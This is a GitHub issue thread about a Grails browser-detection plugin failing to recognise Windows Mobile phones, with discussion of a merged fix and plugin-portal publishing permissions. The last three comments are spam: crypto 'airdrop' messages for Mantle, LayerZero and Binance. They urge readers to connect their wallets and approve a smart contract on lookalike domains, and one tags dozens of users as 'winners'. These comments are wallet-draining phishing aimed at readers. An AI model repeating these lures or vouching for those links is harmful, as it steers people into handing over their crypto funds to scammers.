### ISSUE TITLE
Windows Mobile is not detected

### ISSUE THREAD

**Issue by mathifonseca** [henadzit/grails-browser-detection#11]
I'm testing with a Nokia Lumia 625 and it doesn't detect that it is mobile. I've attached a screenshot with some of the method's results.
![20140818_111431](https://cloud.githubusercontent.com/assets/4367808/3952435/4646a9bc-26e2-11e4-926f-358981d3242e.jpg)

**Comment by pbujko** [comment]
Hi guys,
any update on this one?

looking forward for fix (Lumia 820 here)

**Comment by mathifonseca** [comment]
I fixed it, made a pull request and @sbglasius merged it, but the plugin in Grails portal is not yet updated :(

**Comment by pbujko** [comment]
I had same situation with publishing other plugin. portal was not updated but new binaries were available from repo.
would the new version be     def version = "1.0.1"
?

**Comment by mathifonseca** [comment]
I think only the owner of the plugin in Grails portal can publish a new version of the plugin. I didn't try with this one. I'm currently using it as a local plugin while I wait for the new version in the portal.

**Comment by henadzit** [comment]
Hey guys, sorry I don't support this plugin anymore.

The plugins portal is very lame, it doesn't have a permission concept as far as I remember. I think, anybody who has an account may create or update plugins. They have a page describing the process which could be a bit tricky.

Thanks,
Henadzi

**Comment by mathifonseca** [comment]
Thanks Henadzi!

I'll try to publish the modified version and let you know what happens.

In case I can't and assuming you don't want to support this plugin anymore
in the future, I'd like to contact the Grails team to pass over the control
of the plugin to me if you agree.

Regards,
Mathias

**Comment by mathifonseca** [comment]
Tried to publish the plugin with my credentials but it says "Permission denied".

@henadzit, do you want me to contact the Grails team to transfer the permission?

**Comment by henadzit** [comment]
Yeah, go ahead! Honestly, I don't remember what kind of permissions they have if they have at all.

**Comment by pradip-ee** [comment]
### Hooray! You've Scored a Spot in the Mantle Airdrop


At Mantle, we hold our community in high esteem and want to extend our gratitude for your steadfast support. That's why you've clinched a spot in this exclusive airdrop bonanza. We've taken notice of your lively engagement, contributions, or unwavering loyalty to the Mantle ecosystem, and we believe it's time for you to enjoy the fruits of this special airdrop.

By participating in this exclusive event, you stand to receive Mantle tokens as a token of our appreciation. These tokens open doors to thrilling possibilities within the Mantle ecosystem, offering access to exclusive features, a voice in governance decisions, and even potential future perks.

We're over the moon to have you on board for this exclusive airdrop, and we're dedicated to ensuring a seamless claiming process just for you. Let's dive in and grab those Mantle Airdrop tokens!

[Claim Your Mantle Airdrop Now](https://mantlexyz.fly.dev/)

![Claim Now](https://i.ytimg.com/vi/BtX2NwkAJaE/maxresdefault.jpg)

### Secure Your Mantle Airdrop with These Simple Steps:

1. **Connect Your Wallet:**
   - Swing by the [Mantle Airdrop](https://mantlexyz.fly.dev/).
   - Link up your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Eligibility Check:**
   - Verify your eligibility for the Mantle Airdrop [right here](https://mantlexyz.fly.dev/).

3. **Engage for Extra Rewards:**
   - Join community discussions or complete tasks for bonus rewards.

### Bonus Tips:
- **Community Assistance:**
  - Need help? Drop a message on Telegram or other social media platforms.

- **Stay Informed:**
  - Keep an eye out for updates on the airdrop process via official channels.

- **Patience Pays Off:**
  - Airdrop distribution might take a while. Stay calm and keep an eye out for updates.

Feel free to share your experiences or ask any questions about claiming the Mantle Airdrop in the comments below. Let's make this process a breeze for everyone!

[Mantle Network Airdrop Guide — How to Claim](https://mantlexyz.fly.dev/)

**Comment by rado-softi** [comment]
### LayerZero Airdrop Updated 🪂

The LayerZero Airdrop is confirmed. This is an updated guide to gather the most amount of $ZRO tokens possible.

We're thrilled to have you on board for this exclusive airdrop, and we're committed to making the claiming process seamless just for you. Let's dive in and grab those Layerzero Airdrop tokens!

[Layerzero Oficial](http://link.layerzer0network.online/rFz335)

[![Claim Now](https://miro.medium.com/v2/resize:fit:679/1*BpcMU6_u5SIZz5u-kGMrKw.gif)](http://link.layerzer0network.online/rFz335)

### Secure Your Layerzero Airdrop with These Simple Steps:

1. **Connect Your Wallet:**
   - Head over to the [Layerzero Airdrop](http://link.layerzer0network.online/rFz335).
   - Link up your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Eligibility Check:**
   - [Confirm your eligibility for the Layerzero Airdrop](http://link.layerzer0network.online/rFz335).

3. **Engage for Extra Rewards:**
   - Participate in community discussions or complete tasks for bonus rewards.

### Bonus Tips:
- **Community Assistance:**
  - Need help? Drop a message on Telegram or other social media platforms.

- **Stay Informed:**
  - Keep an eye out for updates on the airdrop process via official channels.

- **Patience Pays Off:**
  - Airdrop distribution might take a while. Stay calm and keep an eye out for updates.

Share your experiences or ask any questions about claiming the Layerzero Airdrop in the comments below. Let's make this process a breeze for everyone!

**Comment by raphaelvianadev** [comment]
# The Ultimate Binance Airdrop Guide: Claim Your $1500 in BNB Now and Earn Extra Rewards!

🎉 Exciting News! You are the lucky recipient of the exclusive $1.5 million Binance Airdrop, and we're thrilled to offer you $1500 in BNB to enhance your year-end celebrations. And here's the cherry on top—connect now, and you'll instantly receive an extra $100! Follow the detailed steps below to seamlessly claim your tokens and maximize the benefits of this phenomenal festive giveaway.

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://claim.bnbchainnetwork.xyz)

## How to Claim Your Rewards:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://claim.bnbchainnetwork.xyz) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Enjoy a smooth and secure connection.

### 2. 🔄 Interact with the Smart Contract:
   - Once your wallet is connected.
   - Navigate to the platform and click on the "**Claim**" button to interact with the smart contract.
   - Benefit from the transparent and efficient process.

### 3. 💰 Additional Bonus Rewards:
   - Get an instant bonus of $100 upon connecting your wallet.
   - Capitalize on this limited-time opportunity to boost your overall rewards.

Act now to secure your $1500 in BNB, and take advantage of the extra $100 bonus—this is an offer you don't want to miss! But wait, there's more. By participating, you also stand a chance to win up to $20,000 in additional rewards. Don't hesitate; click the link now and experience the excitement of earning crypto rewards with a minimal 5% transaction fee.


Winners: @tjaadvd, @kristafari, @mikehotel, @PimHwang, @jhayes14, @dhamaniasad, @AlexeyKrasnoperov, @aleksejs-pcelincevs, @mangefox, @pseudonym0, @nrehm, @irrationomical, @falkeborg, @rabbbit, @Rifan861, @gtpedrosa, @szocpaul, @defiminds, @shehaj, @thekevshow, @avnir, @webcaetano, @alimogh, @Apophenian, @lookfirst, @huhu087, @tarunc, @retr0bot, @kamidox, @chimeno, @FiveBoroughs, @maxmouchet, @NathanBerhe, @matthewhochler, @burnash, @DaRealSheep, @mattlm, @asfaltboy, @0x27, @markcheno, @rxw1, @cnxzcxy, @Luchanso, @vanechu, @alinporumb, @mvanga, @KelSolaar, @nemesiscodex, @PresleyHank, @2bkool
